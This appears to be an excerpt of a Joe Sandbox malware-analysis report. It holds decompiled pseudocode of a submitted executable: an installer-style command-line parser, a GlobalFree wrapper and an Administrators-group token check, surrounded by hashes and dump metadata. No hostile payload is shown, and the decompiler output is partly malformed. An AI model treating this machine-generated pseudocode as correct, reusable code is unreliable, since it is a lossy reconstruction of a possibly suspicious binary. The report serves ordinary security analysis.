                                                          • Instruction ID: eda47b39be623c34b6c5a2301b9219acb1a1340b6fff1d2d4d5b55db93a81e4d
                                                          • Opcode Fuzzy Hash: 29fb8340fa1e6f76654e260a74402cd56a20e6d96b947e30e41a32a22a6e6e24
                                                          • Instruction Fuzzy Hash: 39B0123214420CFBCF101FC2E809F853F1DE7C47A1F240000F60C460809A7794108B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4CC0(void* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = GlobalFree(_a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x010c4cc8
                                                          0x010c4ccf

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: f244440f3fbd8f5b7d04aa854d8530359d5fc3e79c10dd223cfea60e1a4a9374
                                                          • Instruction ID: d5da4952d989e679a32bb0c39f2df689e60985a843c8d48694c118a7940c1ee2
                                                          • Opcode Fuzzy Hash: f244440f3fbd8f5b7d04aa854d8530359d5fc3e79c10dd223cfea60e1a4a9374
                                                          • Instruction Fuzzy Hash: 20B0123100010CFB8F101B42E8088453F1DD6C03A07100010F50C420119B3B98118A84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E010C5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v265;
                                                          				char _v266;
                                                          				char _v267;
                                                          				char _v268;
                                                          				CHAR* _v272;
                                                          				char _v276;
                                                          				signed int _v296;
                                                          				char _v556;
                                                          				signed int _t61;
                                                          				int _t63;
                                                          				char _t67;
                                                          				CHAR* _t69;
                                                          				signed int _t71;
                                                          				void* _t75;
                                                          				char _t79;
                                                          				void* _t83;
                                                          				void* _t85;
                                                          				void* _t87;
                                                          				intOrPtr _t88;
                                                          				void* _t100;
                                                          				intOrPtr _t101;
                                                          				CHAR* _t104;
                                                          				intOrPtr _t105;
                                                          				void* _t111;
                                                          				void* _t115;
                                                          				CHAR* _t118;
                                                          				void* _t119;
                                                          				void* _t127;
                                                          				CHAR* _t129;
                                                          				void* _t132;
                                                          				void* _t142;
                                                          				signed int _t143;
                                                          				CHAR* _t144;
                                                          				void* _t145;
                                                          				void* _t146;
                                                          				void* _t147;
                                                          				void* _t149;
                                                          				char _t155;
                                                          				void* _t157;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				char _t167;
                                                          				char _t170;
                                                          				CHAR* _t173;
                                                          				void* _t177;
                                                          				intOrPtr* _t183;
                                                          				intOrPtr* _t192;
                                                          				CHAR* _t199;
                                                          				void* _t200;
                                                          				CHAR* _t201;
                                                          				void* _t205;
                                                          				void* _t206;
                                                          				int _t209;
                                                          				void* _t210;
                                                          				void* _t212;
                                                          				void* _t213;
                                                          				CHAR* _t218;
                                                          				intOrPtr* _t219;
                                                          				intOrPtr* _t220;
                                                          				signed int _t221;
                                                          				signed int _t223;
                                                          
                                                          				_t173 = __ecx;
                                                          				_t61 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t61 ^ _t221;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_push(__edi);
                                                          				_t209 = 1;
                                                          				if(__ecx == 0 ||  *__ecx == 0) {
                                                          					_t63 = 1;
                                                          				} else {
                                                          					L2:
                                                          					while(_t209 != 0) {
                                                          						_t67 =  *_t173;
                                                          						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                          							_t173 = CharNextA(_t173);
                                                          							continue;
                                                          						}
                                                          						_v272 = _t173;
                                                          						if(_t67 == 0) {
                                                          							break;
                                                          						} else {
                                                          							_t69 = _v272;
                                                          							_t177 = 0;
                                                          							_t213 = 0;
                                                          							_t163 = 0;
                                                          							_t202 = 1;
                                                          							do {
                                                          								if(_t213 != 0) {
                                                          									if(_t163 != 0) {
                                                          										break;
                                                          									} else {
                                                          										goto L21;
                                                          									}
                                                          								} else {
                                                          									_t69 =  *_t69;
                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                          										break;
                                                          									} else {
                                                          										_t69 = _v272;
                                                          										L21:
                                                          										_t155 =  *_t69;
                                                          										if(_t155 != 0x22) {
                                                          											if(_t202 >= 0x104) {
                                                          												goto L106;
                                                          											} else {
                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                          												_t177 = _t177 + 1;
                                                          												_t202 = _t202 + 1;
                                                          												_t157 = 1;
                                                          												goto L30;
                                                          											}
                                                          										} else {
                                                          											if(_v272[1] == 0x22) {
                                                          												if(_t202 >= 0x104) {
                                                          													L106:
                                                          													_t63 = 0;
                                                          													L125:
                                                          													_pop(_t210);
                                                          													_pop(_t212);
                                                          													_pop(_t162);
                                                          													return E010C6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                          												} else {
                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                          													_t177 = _t177 + 1;
                                                          													_t202 = _t202 + 1;
                                                          													_t157 = 2;
                                                          													goto L30;
                                                          												}
                                                          											} else {
                                                          												_t157 = 1;
                                                          												if(_t213 != 0) {
                                                          													_t163 = 1;
                                                          												} else {
                                                          													_t213 = 1;
                                                          												}
                                                          												goto L30;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L131;
                                                          								L30:
                                                          								_v272 =  &(_v272[_t157]);
                                                          								_t69 = _v272;
                                                          							} while ( *_t69 != 0);
                                                          							if(_t177 >= 0x104) {
                                                          								E010C6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                          								asm("int3");
                                                          								_push(_t221);
                                                          								_t222 = _t223;
                                                          								_t71 =  *0x10c8004; // 0x4b13cf70
                                                          								_v296 = _t71 ^ _t223;
                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                          									0x4f0 = 2;
                                                          									_t75 = E010C597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                          								} else {
                                                          									E010C44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                          									 *0x10c9124 = E010C6285();
                                                          									_t75 = 0;
                                                          								}
                                                          								return E010C6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                          							} else {
                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                          								if(_t213 == 0) {
                                                          									if(_t163 != 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										goto L40;
                                                          									}
                                                          								} else {
                                                          									if(_t163 != 0) {
                                                          										L40:
                                                          										_t79 = _v268;
                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                          											if(_t83 == 0) {
                                                          												_t202 = 0x521;
                                                          												E010C44B9(0, 0x521, 0x10c1140, 0, 0x40, 0);
                                                          												_t85 =  *0x10c8588; // 0x0
                                                          												if(_t85 != 0) {
                                                          													CloseHandle(_t85);
                                                          												}
                                                          												ExitProcess(0);
                                                          											}
                                                          											_t87 = _t83 - 4;
                                                          											if(_t87 == 0) {
                                                          												if(_v266 != 0) {
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t215 =  &_v268 + _t167;
                                                          														_t183 =  &_v268 + _t167;
                                                          														_t50 = _t183 + 1; // 0x1
                                                          														_t202 = _t50;
                                                          														do {
                                                          															_t88 =  *_t183;
                                                          															_t183 = _t183 + 1;
                                                          														} while (_t88 != 0);
                                                          														if(_t183 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t205 = 0x5b;
                                                          															if(E010C667F(_t215, _t205) == 0) {
                                                          																L115:
                                                          																_t206 = 0x5d;
                                                          																if(E010C667F(_t215, _t206) == 0) {
                                                          																	L117:
                                                          																	_t202 =  &_v276;
                                                          																	_v276 = _t167;
                                                          																	if(E010C5C17(_t215,  &_v276) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		_t202 = 0x104;
                                                          																		E010C1680(0x10c8c42, 0x104, _v276 + _t167 +  &_v268);
                                                          																	}
                                                          																} else {
                                                          																	_t202 = 0x5b;
                                                          																	if(E010C667F(_t215, _t202) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		goto L117;
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																_t202 = 0x5d;
                                                          																if(E010C667F(_t215, _t202) == 0) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	goto L115;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													 *0x10c8a24 = 1;
                                                          												}
                                                          												goto L50;
                                                          											} else {
                                                          												_t100 = _t87 - 1;
                                                          												if(_t100 == 0) {
                                                          													L98:
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t217 =  &_v268 + _t170;
                                                          														_t192 =  &_v268 + _t170;
                                                          														_t38 = _t192 + 1; // 0x1
                                                          														_t202 = _t38;
                                                          														do {
                                                          															_t101 =  *_t192;
                                                          															_t192 = _t192 + 1;
                                                          														} while (_t101 != 0);
                                                          														if(_t192 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t202 =  &_v276;
                                                          															_v276 = _t170;
                                                          															if(E010C5C17(_t217,  &_v276) == 0) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t104 = CharUpperA(_v267);
                                                          																_t218 = 0x10c8b3e;
                                                          																_t105 = _v276;
                                                          																if(_t104 != 0x54) {
                                                          																	_t218 = 0x10c8a3a;
                                                          																}
                                                          																E010C1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                          																_t202 = 0x104;
                                                          																E010C658A(_t218, 0x104, 0x10c1140);
                                                          																if(E010C31E0(_t218) != 0) {
                                                          																	goto L50;
                                                          																} else {
                                                          																	goto L106;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													_t111 = _t100 - 0xa;
                                                          													if(_t111 == 0) {
                                                          														if(_v266 != 0) {
                                                          															if(_v266 != 0x3a) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t199 = _v265;
                                                          																if(_t199 != 0) {
                                                          																	_t219 =  &_v265;
                                                          																	do {
                                                          																		_t219 = _t219 + 1;
                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                          																		if(_t115 == 0) {
                                                          																			 *0x10c8a2c = 1;
                                                          																		} else {
                                                          																			_t200 = 2;
                                                          																			_t119 = _t115 - _t200;
                                                          																			if(_t119 == 0) {
                                                          																				 *0x10c8a30 = 1;
                                                          																			} else {
                                                          																				if(_t119 == 0xf) {
                                                          																					 *0x10c8a34 = 1;
                                                          																				} else {
                                                          																					_t209 = 0;
                                                          																				}
                                                          																			}
                                                          																		}
                                                          																		_t118 =  *_t219;
                                                          																		_t199 = _t118;
                                                          																	} while (_t118 != 0);
                                                          																}
                                                          															}
                                                          														} else {
                                                          															 *0x10c8a2c = 1;
                                                          														}
                                                          														goto L50;
                                                          													} else {
                                                          														_t127 = _t111 - 3;
                                                          														if(_t127 == 0) {
                                                          															if(_v266 != 0) {
                                                          																if(_v266 != 0x3a) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	_t129 = CharUpperA(_v265);
                                                          																	if(_t129 == 0x31) {
                                                          																		goto L76;
                                                          																	} else {
                                                          																		if(_t129 == 0x41) {
                                                          																			goto L83;
                                                          																		} else {
                                                          																			if(_t129 == 0x55) {
                                                          																				goto L76;
                                                          																			} else {
                                                          																				goto L49;
                                                          																			}
                                                          																		}
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																L76:
                                                          																_push(2);
                                                          																_pop(1);
                                                          																L83:
                                                          																 *0x10c8a38 = 1;
                                                          															}
                                                          															goto L50;
                                                          														} else {
                                                          															_t132 = _t127 - 1;
                                                          															if(_t132 == 0) {
                                                          																if(_v266 != 0) {
                                                          																	if(_v266 != 0x3a) {
                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                          																			goto L49;
                                                          																		}
                                                          																	} else {
                                                          																		_t201 = _v265;
                                                          																		 *0x10c9a2c = 1;
                                                          																		if(_t201 != 0) {
                                                          																			_t220 =  &_v265;
                                                          																			do {
                                                          																				_t220 = _t220 + 1;
                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                          																				if(_t142 == 0) {
                                                          																					_t143 = 2;
                                                          																					 *0x10c9a2c =  *0x10c9a2c | _t143;
                                                          																					goto L70;
                                                          																				} else {
                                                          																					_t145 = _t142 - 3;
                                                          																					if(_t145 == 0) {
                                                          																						 *0x10c8d48 =  *0x10c8d48 | 0x00000040;
                                                          																					} else {
                                                          																						_t146 = _t145 - 5;
                                                          																						if(_t146 == 0) {
                                                          																							 *0x10c9a2c =  *0x10c9a2c & 0xfffffffd;
                                                          																							goto L70;
                                                          																						} else {
                                                          																							_t147 = _t146 - 5;
                                                          																							if(_t147 == 0) {
                                                          																								 *0x10c9a2c =  *0x10c9a2c & 0xfffffffe;
                                                          																								goto L70;
                                                          																							} else {
                                                          																								_t149 = _t147;
                                                          																								if(_t149 == 0) {
                                                          																									 *0x10c8d48 =  *0x10c8d48 | 0x00000080;
                                                          																								} else {
                                                          																									if(_t149 == 3) {
                                                          																										 *0x10c9a2c =  *0x10c9a2c | 0x00000004;
                                                          																										L70:
                                                          																										 *0x10c8a28 = 1;
                                                          																									} else {
                                                          																										_t209 = 0;
                                                          																									}
                                                          																								}
                                                          																							}
                                                          																						}
                                                          																					}
                                                          																				}
                                                          																				_t144 =  *_t220;
                                                          																				_t201 = _t144;
                                                          																			} while (_t144 != 0);
                                                          																		}
                                                          																	}
                                                          																} else {
                                                          																	 *0x10c9a2c = 3;
                                                          																	 *0x10c8a28 = 1;
                                                          																}
                                                          																goto L50;
                                                          															} else {
                                                          																if(_t132 == 0) {
                                                          																	goto L98;
                                                          																} else {
                                                          																	L49:
                                                          																	_t209 = 0;
                                                          																	L50:
                                                          																	_t173 = _v272;
                                                          																	if( *_t173 != 0) {
                                                          																		goto L2;
                                                          																	} else {
                                                          																		break;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										} else {
                                                          											goto L106;
                                                          										}
                                                          									} else {
                                                          										L34:
                                                          										_t209 = 0;
                                                          										break;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L131;
                                                          					}
                                                          					if( *0x10c8a2c != 0 &&  *0x10c8b3e == 0) {
                                                          						if(GetModuleFileNameA( *0x10c9a3c, 0x10c8b3e, 0x104) == 0) {
                                                          							_t209 = 0;
                                                          						} else {
                                                          							_t202 = 0x5c;
                                                          							 *((char*)(E010C66C8(0x10c8b3e, _t202) + 1)) = 0;
                                                          						}
                                                          					}
                                                          					_t63 = _t209;
                                                          				}
                                                          				L131:
                                                          			}


































































                                                          0x010c5c9e
                                                          0x010c5ca9
                                                          0x010c5cb0
                                                          0x010c5cb3
                                                          0x010c5cb6
                                                          0x010c5cb7
                                                          0x010c5cb8
                                                          0x010c5cbd
                                                          0x010c6204
                                                          0x010c5ccb
                                                          0x00000000
                                                          0x010c5ccb
                                                          0x010c5cd3
                                                          0x010c5cd7
                                                          0x010c5cf4
                                                          0x00000000
                                                          0x010c5cf4
                                                          0x010c5cf8
                                                          0x010c5d00
                                                          0x00000000
                                                          0x010c5d06
                                                          0x010c5d06
                                                          0x010c5d0e
                                                          0x010c5d10
                                                          0x010c5d12
                                                          0x010c5d14
                                                          0x010c5d15
                                                          0x010c5d17
                                                          0x010c5d49
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5d19
                                                          0x010c5d19
                                                          0x010c5d1d
                                                          0x00000000
                                                          0x010c5d3f
                                                          0x010c5d3f
                                                          0x010c5d4b
                                                          0x010c5d4b
                                                          0x010c5d4f
                                                          0x010c5d8d
                                                          0x00000000
                                                          0x010c5d93
                                                          0x010c5d93
                                                          0x010c5d9a
                                                          0x010c5d9d
                                                          0x010c5d9e
                                                          0x00000000
                                                          0x010c5d9e
                                                          0x010c5d51
                                                          0x010c5d5b
                                                          0x010c5d72
                                                          0x010c60fb
                                                          0x010c60fb
                                                          0x010c6207
                                                          0x010c620a
                                                          0x010c620b
                                                          0x010c620e
                                                          0x010c6217
                                                          0x010c5d78
                                                          0x010c5d78
                                                          0x010c5d80
                                                          0x010c5d83
                                                          0x010c5d84
                                                          0x00000000
                                                          0x010c5d84
                                                          0x010c5d5d
                                                          0x010c5d5f
                                                          0x010c5d62
                                                          0x010c5d68
                                                          0x010c5d64
                                                          0x010c5d64
                                                          0x010c5d64
                                                          0x00000000
                                                          0x010c5d62
                                                          0x010c5d5b
                                                          0x010c5d4f
                                                          0x010c5d1d
                                                          0x00000000
                                                          0x010c5d9f
                                                          0x010c5d9f
                                                          0x010c5da5
                                                          0x010c5dab
                                                          0x010c5dba
                                                          0x010c6218
                                                          0x010c621d
                                                          0x010c6220
                                                          0x010c6221
                                                          0x010c6229
                                                          0x010c6230
                                                          0x010c6247
                                                          0x010c626a
                                                          0x010c6272
                                                          0x010c6249
                                                          0x010c6255
                                                          0x010c625f
                                                          0x010c6264
                                                          0x010c6264
                                                          0x010c6284
                                                          0x010c5dc0
                                                          0x010c5dc0
                                                          0x010c5dca
                                                          0x010c5e22
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5dcc
                                                          0x010c5dce
                                                          0x010c5e24
                                                          0x010c5e24
                                                          0x010c5e2c
                                                          0x010c5e47
                                                          0x010c5e4a
                                                          0x010c61d2
                                                          0x010c61e2
                                                          0x010c61e7
                                                          0x010c61ee
                                                          0x010c61f1
                                                          0x010c61f1
                                                          0x010c61f8
                                                          0x010c61f8
                                                          0x010c5e50
                                                          0x010c5e53
                                                          0x010c6109
                                                          0x010c611f
                                                          0x00000000
                                                          0x010c6125
                                                          0x010c6137
                                                          0x010c613a
                                                          0x010c613c
                                                          0x010c613e
                                                          0x010c613e
                                                          0x010c6141
                                                          0x010c6141
                                                          0x010c6143
                                                          0x010c6144
                                                          0x010c614a
                                                          0x00000000
                                                          0x010c6150
                                                          0x010c6152
                                                          0x010c615c
                                                          0x010c6170
                                                          0x010c6172
                                                          0x010c617c
                                                          0x010c6190
                                                          0x010c6190
                                                          0x010c6196
                                                          0x010c61a5
                                                          0x00000000
                                                          0x010c61ab
                                                          0x010c61b9
                                                          0x010c61c6
                                                          0x010c61c6
                                                          0x010c617e
                                                          0x010c6180
                                                          0x010c618a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c618a
                                                          0x010c615e
                                                          0x010c6160
                                                          0x010c616a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c616a
                                                          0x010c615c
                                                          0x010c614a
                                                          0x010c610b
                                                          0x010c610e
                                                          0x010c610e
                                                          0x00000000
                                                          0x010c5e59
                                                          0x010c5e59
                                                          0x010c5e5c
                                                          0x010c604f
                                                          0x010c6056
                                                          0x00000000
                                                          0x010c605c
                                                          0x010c606e
                                                          0x010c6071
                                                          0x010c6073
                                                          0x010c6075
                                                          0x010c6075
                                                          0x010c6078
                                                          0x010c6078
                                                          0x010c607a
                                                          0x010c607b
                                                          0x010c6081
                                                          0x00000000
                                                          0x010c6087
                                                          0x010c6087
                                                          0x010c608d
                                                          0x010c609c
                                                          0x00000000
                                                          0x010c60a2
                                                          0x010c60aa
                                                          0x010c60b2
                                                          0x010c60b7
                                                          0x010c60bd
                                                          0x010c60bf
                                                          0x010c60bf
                                                          0x010c60d6
                                                          0x010c60e0
                                                          0x010c60e7
                                                          0x010c60f5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c60f5
                                                          0x010c609c
                                                          0x010c6081
                                                          0x010c5e62
                                                          0x010c5e62
                                                          0x010c5e65
                                                          0x010c5fd3
                                                          0x010c5fe9
                                                          0x00000000
                                                          0x010c5fef
                                                          0x010c5fef
                                                          0x010c5ff7
                                                          0x010c5ffd
                                                          0x010c6003
                                                          0x010c6006
                                                          0x010c6011
                                                          0x010c6014
                                                          0x010c603d
                                                          0x010c6016
                                                          0x010c6018
                                                          0x010c6019
                                                          0x010c601b
                                                          0x010c6033
                                                          0x010c601d
                                                          0x010c6020
                                                          0x010c6029
                                                          0x010c6022
                                                          0x010c6022
                                                          0x010c6022
                                                          0x010c6020
                                                          0x010c601b
                                                          0x010c6042
                                                          0x010c6044
                                                          0x010c6046
                                                          0x010c604a
                                                          0x010c5ff7
                                                          0x010c5fd5
                                                          0x010c5fd8
                                                          0x010c5fd8
                                                          0x00000000
                                                          0x010c5e6b
                                                          0x010c5e6b
                                                          0x010c5e6e
                                                          0x010c5f8b
                                                          0x010c5f99
                                                          0x00000000
                                                          0x010c5f9f
                                                          0x010c5fa7
                                                          0x010c5faf
                                                          0x00000000
                                                          0x010c5fb1
                                                          0x010c5fb3
                                                          0x00000000
                                                          0x010c5fb5
                                                          0x010c5fb7
                                                          0x00000000
                                                          0x010c5fb9
                                                          0x00000000
                                                          0x010c5fb9
                                                          0x010c5fb7
                                                          0x010c5fb3
                                                          0x010c5faf
                                                          0x010c5f8d
                                                          0x010c5f8d
                                                          0x010c5f8d
                                                          0x010c5f8f
                                                          0x010c5fc1
                                                          0x010c5fc1
                                                          0x010c5fc1
                                                          0x00000000
                                                          0x010c5e74
                                                          0x010c5e74
                                                          0x010c5e77
                                                          0x010c5ea0
                                                          0x010c5ebd
                                                          0x010c5f79
                                                          0x00000000
                                                          0x010c5f7f
                                                          0x010c5ec3
                                                          0x010c5ec3
                                                          0x010c5ecc
                                                          0x010c5ed4
                                                          0x010c5ed6
                                                          0x010c5edc
                                                          0x010c5edf
                                                          0x010c5eea
                                                          0x010c5eed
                                                          0x010c5f3f
                                                          0x010c5f40
                                                          0x00000000
                                                          0x010c5eef
                                                          0x010c5eef
                                                          0x010c5ef2
                                                          0x010c5f34
                                                          0x010c5ef4
                                                          0x010c5ef4
                                                          0x010c5ef7
                                                          0x010c5f2b
                                                          0x00000000
                                                          0x010c5ef9
                                                          0x010c5ef9
                                                          0x010c5efc
                                                          0x010c5f22
                                                          0x00000000
                                                          0x010c5efe
                                                          0x010c5eff
                                                          0x010c5f02
                                                          0x010c5f16
                                                          0x010c5f04
                                                          0x010c5f07
                                                          0x010c5f0d
                                                          0x010c5f46
                                                          0x010c5f46
                                                          0x010c5f09
                                                          0x010c5f09
                                                          0x010c5f09
                                                          0x010c5f07
                                                          0x010c5f02
                                                          0x010c5efc
                                                          0x010c5ef7
                                                          0x010c5ef2
                                                          0x010c5f4c
                                                          0x010c5f4e
                                                          0x010c5f50
                                                          0x010c5f54
                                                          0x010c5ed4
                                                          0x010c5ea2
                                                          0x010c5ea4
                                                          0x010c5eaf
                                                          0x010c5eaf
                                                          0x00000000
                                                          0x010c5e79
                                                          0x010c5e7d
                                                          0x00000000
                                                          0x010c5e83
                                                          0x010c5e83
                                                          0x010c5e83
                                                          0x010c5e85
                                                          0x010c5e85
                                                          0x010c5e8e
                                                          0x00000000
                                                          0x010c5e94
                                                          0x00000000
                                                          0x010c5e94
                                                          0x010c5e8e
                                                          0x010c5e7d
                                                          0x010c5e77
                                                          0x010c5e6e
                                                          0x010c5e65
                                                          0x010c5e5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5dd0
                                                          0x010c5dd0
                                                          0x010c5dd0
                                                          0x00000000
                                                          0x010c5dd0
                                                          0x010c5dce
                                                          0x010c5dca
                                                          0x010c5dba
                                                          0x00000000
                                                          0x010c5d00
                                                          0x010c5dd9
                                                          0x010c5e04
                                                          0x010c61fe
                                                          0x010c5e0a
                                                          0x010c5e0c
                                                          0x010c5e17
                                                          0x010c5e17
                                                          0x010c5e04
                                                          0x010c6200
                                                          0x010c6200
                                                          0x00000000

                                                          APIs
                                                          • CharNextA.USER32(?,00000000,?,?), ref: 010C5CEE
                                                          • GetModuleFileNameA.KERNEL32(010C8B3E,00000104,00000000,?,?), ref: 010C5DFC
                                                          • CharUpperA.USER32(?), ref: 010C5E3E
                                                          • CharUpperA.USER32(-00000052), ref: 010C5EE1
                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010C5F6F
                                                          • CharUpperA.USER32(?), ref: 010C5FA7
                                                          • CharUpperA.USER32(-0000004E), ref: 010C6008
                                                          • CharUpperA.USER32(?), ref: 010C60AA
                                                          • CloseHandle.KERNEL32(00000000,010C1140,00000000,00000040,00000000), ref: 010C61F1
                                                          • ExitProcess.KERNEL32 ref: 010C61F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$"$:$RegServer
                                                          • API String ID: 1203814774-25366791
                                                          • Opcode ID: 1b2ba0023a2e9949127f1611155c3cbfa4b6138a17c6b557a5719f0c154200a5
                                                          • Instruction ID: e6078d870a3371982ac7783e84f8104a9460b392d3ecd334f3b82013f98b4084
                                                          • Opcode Fuzzy Hash: 1b2ba0023a2e9949127f1611155c3cbfa4b6138a17c6b557a5719f0c154200a5
                                                          • Instruction Fuzzy Hash: E8D14775B042455EEB7A8B3C8C483FE3FE1AB56F04F0481EED5C6D6285D676A9828F40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E010C18A3(void* __edx, void* __esi) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				char _v20;
                                                          				long _v24;
                                                          				void* _v28;
                                                          				void* _v32;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				signed int _t23;
                                                          				long _t45;
                                                          				void* _t49;
                                                          				int _t50;
                                                          				void* _t52;
                                                          				signed int _t53;
                                                          
                                                          				_t51 = __esi;
                                                          				_t49 = __edx;
                                                          				_t23 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t23 ^ _t53;
                                                          				_t25 =  *0x10c8128; // 0x2
                                                          				_t45 = 0;
                                                          				_v12 = 0x500;
                                                          				_t50 = 2;
                                                          				_v16.Value = 0;
                                                          				_v20 = 0;
                                                          				if(_t25 != _t50) {
                                                          					L20:
                                                          					return E010C6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                          				}
                                                          				if(E010C17EE( &_v20) != 0) {
                                                          					_t25 = _v20;
                                                          					if(_v20 != 0) {
                                                          						 *0x10c8128 = 1;
                                                          					}
                                                          					goto L20;
                                                          				}
                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                          					goto L20;
                                                          				}
                                                          				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                          					L17:
                                                          					CloseHandle(_v28);
                                                          					_t25 = _v20;
                                                          					goto L20;
                                                          				} else {
                                                          					_push(__esi);
                                                          					_t52 = LocalAlloc(0, _v24);
                                                          					if(_t52 == 0) {
                                                          						L16:
                                                          						_pop(_t51);
                                                          						goto L17;
                                                          					}
                                                          					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                          						L15:
                                                          						LocalFree(_t52);
                                                          						goto L16;
                                                          					} else {
                                                          						if( *_t52 <= 0) {
                                                          							L14:
                                                          							FreeSid(_v32);
                                                          							goto L15;
                                                          						}
                                                          						_t15 = _t52 + 4; // 0x4
                                                          						_t50 = _t15;
                                                          						while(EqualSid( *_t50, _v32) == 0) {
                                                          							_t45 = _t45 + 1;
                                                          							_t50 = _t50 + 8;
                                                          							if(_t45 <  *_t52) {
                                                          								continue;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						 *0x10c8128 = 1;
                                                          						_v20 = 1;
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          			}


















